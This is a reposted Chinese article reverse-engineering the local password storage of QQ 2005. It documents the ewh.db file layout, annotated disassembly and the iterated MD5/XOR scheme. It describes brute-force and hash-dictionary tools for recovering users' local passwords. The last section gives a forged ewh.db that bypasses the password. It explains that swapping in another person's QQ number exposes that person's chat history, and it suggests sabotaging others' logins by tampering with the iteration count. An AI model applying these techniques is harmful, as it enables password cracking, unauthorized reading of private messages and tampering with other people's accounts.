QQ 2005贺岁版登录口令加密算法及其源代码 (ZT)

 

拿到QQ 2005贺岁版后，发现其加密原理并没有新的改变，经过跟踪和分析，编制出暴力破解本地QQ密码的程序。
QQ密码在正确登陆后，会将加密的结果保存在用户目录的ewh.db文件中，加密采用公开的MD5算法，通过N次循环以及异或后求反，最终计算出加密的结果，与用户的ewh.db文件中的密文比较后，发出"输入密码与上次成功登录的密码不一致,$0A是否到服务器验证?"（这条信息在BasicCtrlDll.dll的资源中，$0A在C的格式化中为回车）。根据这个提示，完成本地QQ密码的暴力破解。
在QQ系统中，"QD"标志代表QQ Data，例如，我们可以在文件User.db或ewh.db中找到这个以QD开头的数据结构。
一、    ewh.db原始数据
51 44 01 01 03 00 04 03 00 BD AF A8 04 00 00 00
00 2E 06 00 07 03 00 B9 AB B4 10 00 00 00 07 22
AA 96 56 19 A3 9E 82 19 B7 2B BD 2D 34 4A 04 03
00 A9 B5 B2 04 00 00 00 3C A8 93 06
其中，红色为AST循环次数，兰色为EWH加密字符串，绿色为UIN QQ号（110340156=0x0693A83C，Intel体系内存中排列顺序为：3CA89306）。
二、    ewh.db数据结构
HEX
偏移    DEC
偏移    数据    注释    变量
标志
0000    1    51 44    QD，QQ Data 数据标志    Flag
0002    3    01 01    保留的数据结构     Reserve
0004    5    03 00    总数据段（Data Sections）的个数    Sections
0006    7    04    第一个数据段（简称1S，下同）的类型，可以从0x01到0x0F，04代表本数据没经过加密处理。    Type1S
0007    8    03 00    1S标志的长度。    LenFlag1S
0009    10    BD AF A8    1S标志（例如AST、UIN、EWH等），是经过简单的异或并求反计算处理的，此处是AST，可能是Algorithm Shift Times 或Axxx Switch Time，管他的呢！    Flag1S
000C    13    04 00 00 00    1S数据的长度    LenData1S
0010    17    00 2E 06 00
= (404992)    1S数据，这里是进行MD5转换的次数。
这个数据是同计算机的性能有关的，性能越高的计算机，在QQ注册成功后产生的这个循环控制变量就越大。    Data1S
0014    21    07    2S数据的类型，07代表使用MD5进行加密    Type2S
0015    22    03 00    2S标志的长度    LenFlag2S
0017    24    B9 AB B4    2S标志，此处是EWH，代表本数据段是EWH密码数据，可能是Encrypt With Hash的缩写    Flag2S
001A    27    10 00 00 00    2S数据的长度    LenData2S
001E    31    07 22 AA 96
56 19 A3 9E
82 19 B7 2B
BD 2D 34 4A    2S数据，是经过MD5加密计算后产生的数据，当然还要经过异或并求反的计算处理，参考下面程序中的1000B858 行代码。    Data2S
002E    47    04    3S数据的类型    Type3S
002F    48    03 00    3S标志的长度    LenFlag3S
0031    50    A9 B5 B2    3S标志，此处是UIN，代表本数据段是QQ号码，可能是：User Identifier Number的缩写    Flag3S
0034    53    04 00 00 00    3S数据的长度    LenData3S
0038    57    3C A8 93 06    3S数据，3C A8 93 06 = 110340156    Data3S
三、    加密原理
下面VB伪代码的部分符号引自以上第二点《结构说明》中的变量标志，请注意理解：
Pwd = MD5(Pwd, Len(Pwd))  
' Pwd为用户输入的密码，第一轮MD5后，Pwd成为16位字节长度的MD5串。
XorKey As Long = 0  'XorKey为用于解密的字节
For k = 1 To Data1S - 1  '因为前面已经做过一轮，所以此处要减一
Pwd = MD5(Pwd, 16)
Next k
XorKey = XorKey And &HFFFF
XorKey = (LenData2S And &HFF) Xor (LenData2S / 256)
XorKey = &HFF - XorKey '求反
For k = 1 To 16
Pwd(k) = Pwd(k) Xor XorKey
Next k
If Pwd <> Data2S Then
  MsgBox "输入密码与上次成功登录的密码不一致," & vbcrlf & "是否到服务器验证?"
End If

通过以上的流程，我真的佩服QQ的设计者，如此巨大的循环量，加上循环次数的随机性，如果希望产生一个QQ MD5词典简直不可能。虽然理论上，可以产生一个MD5字典，但是，这个字典将有1.15E+77*16个字节之巨，因此，只好根据ewh.db文件提供的数据暴力破解了，不知是不是有更好的方法呢？
不过我的感觉是，循环次数加多了，应该会产生更多的MD5碰撞，不见得是个好事。
还有一种破解思路，也许更加直接，将在后面的文章中详细探讨。但是我只有在有时间做完实验后才有资格评述，不在本文章的讨论范围内。
四、    破解算法
重复进行数十万次MD5加密，会消耗计算机很多时间，如果使用传统的VB或VC，对于一个密码的等待时间也是很可观的（例如使用VB代码，消耗的时间可能是汇编的400倍），因此，我使用汇编语言来编制低层加密解密算法，通过MASM32编译连接，最后用高级语言调用。通过提供算法动态库的方式，方便其他有兴趣的读者自己增加丰富的功能。例如增加多线程等，这也将在以后的探讨中实现。在此不做深入讨论。
附带的例子为VB和VC调用汇编语言动态库的例子，VB代码简单实现了通过密码字典进行单线程破解的功能，读者可以丰富其内容。增加更多的功能。
五、    QQ数据结构分析
下面为动态库BasicCtrlDll.dll中反汇编的代码以及代码分析，主要用于分析EWH.DB中数据结构以及QQ数据解调算法的问题。另外，这个算法也可以将User.db中的数据提取出来。深入研究下去，做一个聊天记录查看器之类的软件也非难事。

1000B71D    B8 AC160110    mov eax,BasicCtr.100116AC    
1000B722    E8 89460000    call BasicCtr.1000FDB0    
1000B727    83EC 3C    sub esp,3C    
1000B72A    8B45 08    mov eax,dword ptr ss:[ebp+8]    将数据的开始地址赋给EAX，实际数据为**Data，EAX=*Data
1000B72D    53    push ebx    
1000B72E    56    push esi    
1000B72F    57    push edi    
1000B730    8B30    mov esi,dword ptr ds:[eax]    需要转换的字符串，EAX指示一个结构，第一个成员为实际的数据指针
1000B732    894D D8    mov dword ptr ss:[ebp-28],ecx    局部变量[ebp-28]保存全局的标志结构，ECX为全局参数地址，在调用本函数时跟入
1000B735    8B46 F8    mov eax,dword ptr ds:[esi-8]    为CString结构中长度的成员，表示总共多少个字节
1000B738    83F8 06    cmp eax,6    如果长度小于6，则为无效的数据
1000B73B    0F82 81020000    jb BasicCtr.1000B9C2    如果比6小则跳转退出，说明数据量不够解调的
1000B741    803E 51    cmp byte ptr ds:[esi],51    是否为 QQ Data 的数据，QD为QQ数据标志
1000B744    0F85 78020000    jnz BasicCtr.1000B9C2    
1000B74A    807E 01 44    cmp byte ptr ds:[esi+1],44    
1000B74E    0F85 6E020000    jnz BasicCtr.1000B9C2    
1000B754    66:8B7E 04    mov di,word ptr ds:[esi+4]    对于EWH来说，为第4+1个字节，为0003
1000B758    83C6 04    add esi,4    指向数据段(Sections)的个数
1000B75B    46    inc esi    
1000B75C    83C0 FA    add eax,-6    EAX去掉6个字节，对于EWH来说，剩下36H个字节
1000B75F    46    inc esi    
1000B760    8945 08    mov dword ptr ss:[ebp+8],eax    指向第一个数据段
1000B763    E8 CE050000    call BasicCtr.1000BD36    在内存（ECX+9C）处开辟一个(100H)字节的空间，空间地址返回到EAX
1000B768    8365 E0 00    and dword ptr ss:[ebp-20],0     局部变量[ebp-20]清零
1000B76C    0FB7C7    movzx eax,di    转换到EAX，对于EWH，di=3。表示有3段数据
1000B76F    85C0    test eax,eax    
1000B771    8945 B8    mov dword ptr ss:[ebp-48],eax    局部变量[ebp-48]保存数据的段数
1000B774    0F8E 21020000    jle BasicCtr.1000B99B    
1000B77A    837D 08 07    cmp dword ptr ss:[ebp+8],7    如果整个长度小于7，则剩下的应该是QQ号了。第一次进入时=36H
1000B77E    0F82 3E020000    jb BasicCtr.1000B9C2    如果剩余的数据长度小于7则退出
1000B784    8A06    mov al,byte ptr ds:[esi]    第一次进入时，ESI指向第7个数据即数据段的类型，例如 04
1000B786    66:8B4E 01    mov cx,word ptr ds:[esi+1]    CX=后一个数据，及数据段标志的长度，例如 0003
1000B78A    46    inc esi    
1000B78B    8B55 08    mov edx,dword ptr ss:[ebp+8]    剩余的数据长度，如36H
1000B78E    836D 08 03    sub dword ptr ss:[ebp+8],3    去掉3个，例如成为33H=51
1000B792    894D C8    mov dword ptr ss:[ebp-38],ecx    局部变量[ebp-38]保存数据段中标志长度
1000B795    0FB7F9    movzx edi,cx    EDI为标志长度了
1000B798    46    inc esi    
1000B799    8845 E4    mov byte ptr ss:[ebp-1C],al    局部变量[ebp-1C]保存本段的类型
1000B79C    8D4F 04    lea ecx,dword ptr ds:[edi+4]    ECX为取得的标志长度再加上4，例如=7
1000B79F    46    inc esi    第一次时，ESI指向第一个数据段的标志字段了，例如指向BDAFA8，第9个数据开始
1000B7A0    394D 08    cmp dword ptr ss:[ebp+8],ecx    如果剩余的数据比"标志长度+4"还少，则没有数据，因此不进行处理
1000B7A3    0F82 19020000    jb BasicCtr.1000B9C2    
1000B7A9    8B0C37    mov ecx,dword ptr ds:[edi+esi]    跳过数据段的标志部分，将数据段的长度赋值给ECX。例如[edi+esi]=4
1000B7AC    8D1C37    lea ebx,dword ptr ds:[edi+esi]    EBX保存新的指针，指向数据段中数据部分的长度部分，例如，[EBX]=4
1000B7AF    895D C4    mov dword ptr ss:[ebp-3C],ebx    局部变量[ebp-3C]保存数据段中数据部分的长度指针
1000B7B2    8D4C0F 07    lea ecx,dword ptr ds:[edi+ecx+7]    从标志（自身长3，加上4个长度位=7）开始，加上数据长度，为完整数据长度。例如E
1000B7B6    3BCA    cmp ecx,edx    如果剩下的数据长度（如36H）不够，则退出
1000B7B8    894D CC    mov dword ptr ss:[ebp-34],ecx    局部变量[ebp-34]保存本数据段的总长度
1000B7BB    0F87 01020000    ja BasicCtr.1000B9C2    如果小于则退出程序
1000B7C1    8365 F0 00    and dword ptr ss:[ebp-10],0    局部变量[ebp-10]清零
1000B7C5    3C 01    cmp al,1    al保存本段的类型，有效的类型是4或7
1000B7C7    74 18    je short BasicCtr.1000B7E1    
1000B7C9    3C 02    cmp al,2    
1000B7CB    74 14    je short BasicCtr.1000B7E1    
1000B7CD    3C 03    cmp al,3    
1000B7CF    74 10    je short BasicCtr.1000B7E1    
1000B7D1    3C 04    cmp al,4    
1000B7D3    74 0C    je short BasicCtr.1000B7E1    
1000B7D5    3C 05    cmp al,5    
1000B7D7    74 08    je short BasicCtr.1000B7E1    
1000B7D9    3C 07    cmp al,7    
1000B7DB    74 04    je short BasicCtr.1000B7E1    
1000B7DD    3C 06    cmp al,6    
1000B7DF    75 19    jnz short BasicCtr.1000B7FA    
1000B7E1    51    push ecx    为本段的总长度，包括（段类型+标志长度+标志+数据长度+数据），例如，对于密码段=1AH
1000B7E2    E8 23430000    call <MFC42.operator new>    
1000B7E7    FF75 CC    push dword ptr ss:[ebp-34]    n=[ebp-34]，局部变量[ebp-34]保存本数据段的总长度
1000B7EA    8D4E FD    lea ecx,dword ptr ds:[esi-3]    [esi-3]指向本段的开始（从段类型算起）
1000B7ED    8945 F0    mov dword ptr ss:[ebp-10],eax    局部变量[ebp-10]保存拷贝后的数据
1000B7F0    51    push ecx    src
1000B7F1    50    push eax    dest
1000B7F2    E8 E5450000    call <MSVCRT.memcpy>    memcpy，将本段的整段数据拷贝到新的地方，数据指针保存在局部变量[ebp-10]中
1000B7F7    83C4 10    add esp,10    
1000B7FA    8B45 C8    mov eax,dword ptr ss:[ebp-38]    局部变量[ebp-38]保存数据段中标志长度
1000B7FD    33C9    xor ecx,ecx    
1000B7FF    32C4    xor al,ah    将低位长度与高位异或，例如3 xor 0=3
1000B801    85FF    test edi,edi    EDI为标志位的长度
1000B803    76 12    jbe short BasicCtr.1000B817    如果本段没有段标志，则跳转
1000B805    8A1431    mov dl,byte ptr ds:[ecx+esi]    开始循环，循环次数为标志的长度。ECX第一次时为0，将第一个数据加载到DL中。
1000B808    32D0    xor dl,al    AL为长度的高位和低位的异或，这里为3
1000B80A    F6D2    not dl    DL=NOT ([数据] xor [数据段标志长度的高位 xor 数据段标志长度的低位])
1000B80C    881431    mov byte ptr ds:[ecx+esi],dl    数据保存在原始的内存中相应的地方
1000B80F    41    inc ecx    
1000B810    3BCF    cmp ecx,edi    
1000B812    72 F1    jb short BasicCtr.1000B805    
1000B814    8B5D C4    mov ebx,dword ptr ss:[ebp-3C]    局部变量[ebp-3C]保存数据段中数据部分的长度指针
1000B817    57    push edi    EDI为标志位的长度
1000B818    56    push esi    ESI为指向解密以后的数据，例如AST
1000B819    8D4D E8    lea ecx,dword ptr ss:[ebp-18]    局部变量[ebp-18]存放强制类型转换以后的数据指针的指针，例如AST
1000B81C    E8 5B430000    call <MFC42.CString::CString>    将解密后的数据变成CString类型。返回的类型放在EAX指示的地址中
1000B821    8365 FC 00    and dword ptr ss:[ebp-4],0    局部变量[ebp-4]清零
1000B825    6A FC    push -4    
1000B827    58    pop eax    EAX=-4=FFFFFFFC
1000B828    8BF3    mov esi,ebx    ebx保存数据段中数据部分的长度指针
1000B82A    2BC7    sub eax,edi    EAX=EAX-EDI=FFFFFFFC-3=FFFFFFF9
1000B82C    8B1E    mov ebx,dword ptr ds:[esi]    ebx为数据段中数据部分的长度了
1000B82E    0145 08    add dword ptr ss:[ebp+8],eax    第一次时，[EBP+8]=33。执行后=2C，相当于33H-7H=2CH
1000B831    83C6 04    add esi,4    ESI指向数据段中的数据部分了
1000B834    395D 08    cmp dword ptr ss:[ebp+8],ebx    [ebp+8]=2C，ebx=4
1000B837    0F82 6A010000    jb BasicCtr.1000B9A7    
1000B83D    807D E4 07    cmp byte ptr ss:[ebp-1C],7    局部变量[ebp-1C]保存本段的类型，4或者7
1000B841    74 06    je short BasicCtr.1000B849    
1000B843    807D E4 06    cmp byte ptr ss:[ebp-1C],6    如果类型不为6，则执行1000B862
1000B847    75 19    jnz short BasicCtr.1000B862    
1000B849    8AC3    mov al,bl    如果数据段的类型为7，则执行此语句。BL包含本段的长度
1000B84B    33FF    xor edi,edi    
1000B84D    32C7    xor al,bh    al=（长度的低位 xor 长度的高位）
1000B84F    85DB    test ebx,ebx    
1000B851    76 0F    jbe short BasicCtr.1000B862    如果长度为0，则表示没有密码
1000B853    8A0C37    mov cl,byte ptr ds:[edi+esi]    
1000B856    32C8    xor cl,al    
1000B858    F6D1    not cl    DL=NOT ([数据] xor [数据段标志长度的高位xor 数据段标志长度的低位])
1000B85A    880C37    mov byte ptr ds:[edi+esi],cl    
1000B85D    47    inc edi    
1000B85E    3BFB    cmp edi,ebx    
1000B860    72 F1    jb short BasicCtr.1000B853    循环直到全部数据解调完毕
1000B862    53    push ebx    数据串的长度
1000B863    56    push esi    原始的需要变换的数据
1000B864    8D4D EC    lea ecx,dword ptr ss:[ebp-14]    局部变量[ebp-14]存放强制CString类型转换以后的数据指针的指针，例如DB2E0600
1000B867    E8 10430000    call <MFC42.CString::CString>    
1000B86C    8A45 E4    mov al,byte ptr ss:[ebp-1C]    局部变量[ebp-1C]保存本段的类型，4或者7
1000B86F    295D 08    sub dword ptr ss:[ebp+8],ebx    去掉已经处理的数据，执行后[ebp+8]=28H，ebx为数据段中数据部分的长度
1000B872    03F3    add esi,ebx    ESI指向下一个数据段的开始部分，ebx保存数据段中数据部分的长度指针
1000B874    33FF    xor edi,edi 

1000B876    84C0    test al,al    测试本段的类型是否为0
1000B878    C645 FC 01    mov byte ptr ss:[ebp-4],1    局部布尔型变量[ebp-4]=1
1000B87C    0F86 A3010000    jbe BasicCtr.1000BA25    如果本段的数据类型为0，则执行1000BA25后退出
1000B882    3C 07    cmp al,7    
1000B884    0F86 B6000000    jbe BasicCtr.1000B940    如果小于等于7，则跳转到1000B940执行。对于EWH来说就是这样
1000B88A    3C 08    cmp al,8    
1000B88C    0F84 74010000    je BasicCtr.1000BA06    如果数据类型为8，则直接退出。
1000B892    3C 09    cmp al,9    
1000B894    74 5D    je short BasicCtr.1000B8F3    
1000B896    3C 0A    cmp al,0A    
1000B898    0F85 87010000    jnz BasicCtr.1000BA25    
1000B89E    8B4D D8    mov ecx,dword ptr ss:[ebp-28]    当数据类型为A时，执行本程序代码
1000B8A1    8D45 D4    lea eax,dword ptr ss:[ebp-2C]    
1000B8A4    50    push eax    
1000B8A5    E8 47FEFFFF    call BasicCtr.1000B6F1    
1000B8AA    8B45 D4    mov eax,dword ptr ss:[ebp-2C]    
1000B8AD    FF75 EC    push dword ptr ss:[ebp-14]    
1000B8B0    8B08    mov ecx,dword ptr ds:[eax]    
1000B8B2    53    push ebx    
1000B8B3    50    push eax    
1000B8B4    FF91 BC000000    call dword ptr ds:[ecx+BC]    
1000B8BA    8BD8    mov ebx,eax    
1000B8BC    85DB    test ebx,ebx    
1000B8BE    0F85 12010000    jnz BasicCtr.1000B9D6    
1000B8C4    8B45 D4    mov eax,dword ptr ss:[ebp-2C]    
1000B8C7    6A 04    push 4    
1000B8C9    8945 DC    mov dword ptr ss:[ebp-24],eax    
1000B8CC    8D45 DC    lea eax,dword ptr ss:[ebp-24]    
1000B8CF    50    push eax    
1000B8D0    8D4D C0    lea ecx,dword ptr ss:[ebp-40]    
1000B8D3    E8 A4420000    call <MFC42.CString::CString>    
1000B8D8    50    push eax    
1000B8D9    8D4D EC    lea ecx,dword ptr ss:[ebp-14]    
1000B8DC    C645 FC 03    mov byte ptr ss:[ebp-4],3    
1000B8E0    E8 C3400000    call <MFC42.CString::operator=>    
1000B8E5    C645 FC 01    mov byte ptr ss:[ebp-4],1    
1000B8E9    8D4D C0    lea ecx,dword ptr ss:[ebp-40]    
1000B8EC    E8 AB400000    call <MFC42.CString::~CString>    
1000B8F1    EB 50    jmp short BasicCtr.1000B943    
1000B8F3    8B4D D8    mov ecx,dword ptr ss:[ebp-28]    当数据类型为9时，执行这个操作
1000B8F6    8D45 D0    lea eax,dword ptr ss:[ebp-30]    
1000B8F9    50    push eax    
1000B8FA    E8 4E180000    call BasicCtr.1000D14D    
1000B8FF    8B45 D0    mov eax,dword ptr ss:[ebp-30]    
1000B902    FF75 EC    push dword ptr ss:[ebp-14]    
1000B905    8B08    mov ecx,dword ptr ds:[eax]    
1000B907    53    push ebx    
1000B908    50    push eax    
1000B909    FF51 78    call dword ptr ds:[ecx+78]    
1000B90C    8BD8    mov ebx,eax    
1000B90E    85DB    test ebx,ebx    
1000B910    0F85 D4000000    jnz BasicCtr.1000B9EA    
1000B916    8B45 D0    mov eax,dword ptr ss:[ebp-30]    
1000B919    6A 04    push 4    
1000B91B    8945 DC    mov dword ptr ss:[ebp-24],eax    
1000B91E    8D45 DC    lea eax,dword ptr ss:[ebp-24]    
1000B921    50    push eax    
1000B922    8D4D BC    lea ecx,dword ptr ss:[ebp-44]    
1000B925    E8 52420000    call <MFC42.CString::CString>    
1000B92A    50    push eax    
1000B92B    8D4D EC    lea ecx,dword ptr ss:[ebp-14]    
1000B92E    C645 FC 02    mov byte ptr ss:[ebp-4],2    
1000B932    E8 71400000    call <MFC42.CString::operator=>    
1000B937    C645 FC 01    mov byte ptr ss:[ebp-4],1    
1000B93B    8D4D BC    lea ecx,dword ptr ss:[ebp-44]    
1000B93E    EB AC    jmp short BasicCtr.1000B8EC    
1000B940    6A 01    push 1    当数据段的类型<=7时，直接从此处执行
1000B942    5F    pop edi    
1000B943    8B5D D8    mov ebx,dword ptr ss:[ebp-28]    局部变量[ebp-28]保存全局的标志结构
1000B946    8D45 EC    lea eax,dword ptr ss:[ebp-14]    局部变量[ebp-14]存放强制类型转换以后的数据指针的指针，例如DB2E0600
1000B949    50    push eax    EAX存放强制类型转换以后的数据指针
1000B94A    8D45 E8    lea eax,dword ptr ss:[ebp-18]    局部变量[ebp-18]存放强制类型转换以后的数据指针的指针，例如AST
1000B94D    FF75 E4    push dword ptr ss:[ebp-1C]    局部变量[ebp-1C]中的第一个字节保存本段的类型，4或者7
1000B950    8BCB    mov ecx,ebx    
1000B952    50    push eax    
1000B953    E8 B4FCFFFF    call BasicCtr.1000B60C    call 1000B60C(CString,Flag,CString)
1000B958    85FF    test edi,edi    
1000B95A    74 18    je short BasicCtr.1000B974    
1000B95C    8B45 E0    mov eax,dword ptr ss:[ebp-20]    局部变量[ebp-28]第一次为0，为一个计数器
1000B95F    8B4B 64    mov ecx,dword ptr ds:[ebx+64]    存在于标志结构中，为一个全局地址
1000B962    8B55 F0    mov edx,dword ptr ss:[ebp-10]    局部变量[ebp-10]保存拷贝后的数据，即没有经过处理的。例如040300BDAF......
1000B965    C1E0 02    shl eax,2    EAX=EAX*2
1000B968    891401    mov dword ptr ds:[ecx+eax],edx    将未做解调的原始数据放到全局结构中某个指针指示的内存中
1000B96B    8B4B 78    mov ecx,dword ptr ds:[ebx+78]    存在于标志结构中，为一个全局地址
1000B96E    8B55 CC    mov edx,dword ptr ss:[ebp-34]    局部变量[ebp-34]保存本数据段的总长度
1000B971    891401    mov dword ptr ds:[ecx+eax],edx    将数据长度放到全局结构中某个指针指示的内存中
1000B974    8065 FC 00    and byte ptr ss:[ebp-4],0    局部布尔型变量[ebp-4]=0
1000B978    8D4D EC    lea ecx,dword ptr ss:[ebp-14]    
1000B97B    E8 1C400000    call <MFC42.CString::~CString>    清除数据段中的数据部分CString
1000B980    834D FC FF    or dword ptr ss:[ebp-4],FFFFFFFF    局部布尔型变量[ebp-4]=-1，为True
1000B984    8D4D E8    lea ecx,dword ptr ss:[ebp-18]    
1000B987    E8 10400000    call <MFC42.CString::~CString>    清除数据段中的标志部分CString，例如AST
1000B98C    FF45 E0    inc dword ptr ss:[ebp-20]    局部变量[ebp-28]计数器加一
1000B98F    8B45 E0    mov eax,dword ptr ss:[ebp-20]    
1000B992    3B45 B8    cmp eax,dword ptr ss:[ebp-48]    局部变量[ebp-48]保存数据的段数
1000B995    0F8C DFFDFFFF    jl BasicCtr.1000B77A    循环解调每个数据段
1000B99B    8B45 08    mov eax,dword ptr ss:[ebp+8]    最后剩余的长度
1000B99E    F7D8    neg eax    
1000B9A0    1BC0    sbb eax,eax    
1000B9A2    83E0 04    and eax,4    
1000B9A5    EB 1E    jmp short BasicCtr.1000B9C5    
1000B9A7    837D F0 00    cmp dword ptr ss:[ebp-10],0    
1000B9AB    74 09    je short BasicCtr.1000B9B6    
1000B9AD    FF75 F0    push dword ptr ss:[ebp-10]    
1000B9B0    E8 FF3F0000    call <MFC42.operator delete>    
1000B9B5    59    pop ecx    
1000B9B6    834D FC FF    or dword ptr ss:[ebp-4],FFFFFFFF    
1000B9BA    8D4D E8    lea ecx,dword ptr ss:[ebp-18]    
1000B9BD    E8 DA3F0000    call <MFC42.CString::~CString>    
1000B9C2    6A 04    push 4    
1000B9C4    58    pop eax    
1000B9C5    8B4D F4    mov ecx,dword ptr ss:[ebp-C]    
1000B9C8    5F    pop edi    
1000B9C9    5E    pop esi    
1000B9CA    5B    pop ebx    
1000B9CB    64:890D 000000    mov dword ptr fs:[0],ecx    
1000B9D2    C9    leave    
1000B9D3    C2 0400    retn 4    
1000B9D6    837D F0 00    cmp dword ptr ss:[ebp-10],0    
1000B9DA    74 09    je short BasicCtr.1000B9E5    
1000B9DC    FF75 F0    push dword ptr ss:[ebp-10]    
1000B9DF    E8 D03F0000    call <MFC42.operator delete>    
1000B9E4    59    pop ecx    
1000B9E5    8B45 D4    mov eax,dword ptr ss:[ebp-2C]    
1000B9E8    EB 12    jmp short BasicCtr.1000B9FC    
1000B9EA    837D F0 00    cmp dword ptr ss:[ebp-10],0    
1000B9EE    74 09    je short BasicCtr.1000B9F9    
1000B9F0    FF75 F0    push dword ptr ss:[ebp-10]    
1000B9F3    E8 BC3F0000    call <MFC42.operator delete>    
1000B9F8    59    pop ecx    
1000B9F9    8B45 D0    mov eax,dword ptr ss:[ebp-30]    
1000B9FC    8B08    mov ecx,dword ptr ds:[eax]    
1000B9FE    50    push eax    
1000B9FF    FF51 08    call dword ptr ds:[ecx+8]    
1000BA02    8BF3    mov esi,ebx    
1000BA04    EB 03    jmp short BasicCtr.1000BA09    
1000BA06    6A 04    push 4    
1000BA08    5E    pop esi    
1000BA09    8065 FC 00    and byte ptr ss:[ebp-4],0    
1000BA0D    8D4D EC    lea ecx,dword ptr ss:[ebp-14]    
1000BA10    E8 873F0000    call <MFC42.CString::~CString>    
1000BA15    834D FC FF    or dword ptr ss:[ebp-4],FFFFFFFF    
1000BA19    8D4D E8    lea ecx,dword ptr ss:[ebp-18]    
1000BA1C    E8 7B3F0000    call <MFC42.CString::~CString>    
1000BA21    8BC6    mov eax,esi    
1000BA23    EB A0    jmp short BasicCtr.1000B9C5    
1000BA25    8065 FC 00    and byte ptr ss:[ebp-4],0    
1000BA29    8D4D EC    lea ecx,dword ptr ss:[ebp-14]    
1000BA2C    E8 6B3F0000    call <MFC42.CString::~CString>    
1000BA31    EB 83    jmp short BasicCtr.1000B9B6    

以上代码看不懂没关系，在压缩包中的VB代码 LoAnalysisQD (fbyt() As Byte) 函数概括了上述的思想，不过，对于4和7以外的数据类型，由于与本文内容无关，因此，不深入分析。
六、    QQ的另类破解
1、QQ密码算法和身份验证中存在的问题
搞个几十万次加密其实并不能阻止密码的破解，我对现在收集的EWH.db进行统计，那个循环的AST都在40万以上（可以买房子了，不是么？），因此，只要做一个40万的QQ Hash词典，在此基础上进行破解，破解速度不就提高了几万倍么？
这个词典如何形成？问得好！事实上，国际上有合作破解的先例。例如，可以给我分配000000000~999999999的段进行计算，给你分配999999999~1999999999的段进行计算......，最后，将所有结果合成为一个词典（或者根本不用合成，把Hash值发给大家就可以了，总有人能中大奖：）。
这个词典称为Hash词典，大致上是这样的（密码经过400000次加密后得到）：
索引（密码）    Hash值（加密后的密文）
1    2E62CD38389C3A885D7F6789FEEE8AA5
2    1F9C9B12E93A0FF2A9B7A714EF4D6CA4
3    8FE71CEF95D0F0DDAD716651E635D19C
......    ......
999999999    A041F9E6DDA44C178F24DABC9B292785
有了这个Hash词典，我们完全没有必要重新忍受漫长的计算过程，直接查表就可以了，不是吗？用黑客的行话来说，就是跑字典了。
利用压缩包中提供的函数QQMD5(unsigned char *, long, long, QQSum *)，就完全可以形成这个词典了。
别笑，这好象是大炮打蚊子，对于一个小小的QQ来说，何必劳驾全世界呢？既然这是我们闲得无聊下来干的事，我们就该自己来做。
最简单的Hash词典就是利用黑客词典（网上简直多如牛毛）再通过QQMD5函数来生成，如果你想到用数据库来管理这些Hash值，你一定是个非常敬业的黑客，不过数据库也是TB级的了。
Hash散列算法非常容易产生碰撞，如果你偶尔发现输入12345和输入78952一样可以登录QQ，你千万不要怪腾讯公司没水平，这是因为12345和78952产生的Hash相同（别试，我随便说的两个数），这说明，一个Hash输出可能对应多个输入，这就是碰撞。听说山东大学的王教授就很擅长产生这种碰撞，强烈要求他来做我们的斑竹。
因为碰撞，我们的词典就会小一点，不过，这些理想和共产主义一样，离我们很远，即使王教授的快速碰撞理论，对于QQ这样的重复加密来说，只是加快计算时间，并不能对整个加密体系构成威胁，所以，即使这个世界有那么多的恐怖份子，你我夏天还是穿个短裤就可以上街。
况且，现在很多的及时通讯系统都采用本地和服务器联合验证的方式，这非常有效，即使本地的密码被攻破了，但是，不能保证服务器的也被攻破。因为，通过暴力方式破解的登录口令也只是众多产生碰撞的口令之一，如果使用不同的加密方式，即使这个口令能进入本地系统，但是不能保证同一个口令在服务器端得到验证。所以，QQ从这个意义上说，依然是相对安全的（不过众多口令中，可能就只有一个特别象口令）。
如果我是腾讯的老总，说实话，在我垄断市场的情况下，我并不希望自己的口令体系多么坚不可摧，用户有了危机感，我才能从用户手中收取保护费吧：）所以，诸如此类的文章或者工具即使漫天飞也只是帮他做市场而已。
刚才提到密码算法的问题，谈到的所有问题都是本地的密码机制，对于网络之间的报文，采用的又是TEA的加密算法。这个是我后面的文章要分析的。
在QQ的身份验证中，还存在另外一个漏洞，这个漏洞很早就被发现了，一直保留到现在，也许将来也不会改变。
我不说大家也都知道，将EWH.DB中的QQ号（第一点中的那个3C A8 93 06）替换成别人的QQ号，然后把这个东西放在别人的目录下，就可以看到那个倒霉蛋的聊天记录了。不过，好在腾迅的服务器不买这个帐：看就看吧，只要我这里安全就没事了，多看点多学点，下次聊天就更欢了。
从低层的逻辑也可以看得出来，只要用户的EWH.DB文件符合我们前面的算法，QQ就认为这个用户是合法的。因此，我们完全可以想象，如果我自己做一个EWH.DB文件，让那个40万次的东西变成0，岂不是可以让我的计算机从那个傻呼呼的循环中解脱出来吗？更懒的人可能想到，如果不用密码岂不是更爽？好，我们来实现这个愿望：
运行QQPwdFinality.exe，将登录口令中的"12345"删掉，将"循环次数"改为0，进行单步计算后，是不是得到了一个串？如果你的计算机没骗你的话，大家应该都得到同一个结果：3BF2633660EF5DEB066FE6770317AD91，好了，我们将这个结果替换掉EWH.DB中的那个Hash值07 22 AA 96 56 19 A3 9E 82 19 B7 2B BD 2D 34 4A，最后，EWH.DB文件变成下面这个样子（记得将循环次数也改成0哦）：

51 44 01 01 03 00 04 03 00 BD AF A8 04 00 00 00
00 00 00 00 07 03 00 B9 AB B4 10 00 00 00 3B F2
63 36 60 EF 5D EB 06 6F E6 77 03 17 AD 91 04 03
00 A9 B5 B2 04 00 00 00 3C A8 93 06

我知道在座的懒人很多（包括我自己），我特地在QQPwdFinality.exe文件中加入了一个"产生EWH.DB文件"选项，我知道你可能连这都懒得勾，所以默认情况下，我帮你勾上了。 你可以选择任何口令和循环次数来形成EWH.DB文件，文件会生成在当前的目录下。
好了，现在，你再也不用拿着你那个EWH.DB文件到处奔波了，你就用这个吧，毛爷爷不是说过吗？打击敌人的同时还要保护自己，你用自己的口令到处看别人的记录，查出来多不好，况且，一旦忘记删掉了，被受害者拿去，访高手找名人，那你就可能重新申请QQ号了。不过，如果按照这个原理将自己的QQ改造一下，你就比任何人都更快地进入QQ，抢先零点几秒找到PLMM。但是千万别干坏事哦，如果你将别人的AST改成FFFFFF7F的话，估计他要等一天才能和自己心爱的MM聊天了，你忍心下手吗？是不是有人想到发明一个病毒，专门修改这个号，让登录越来越慢啊呵呵。
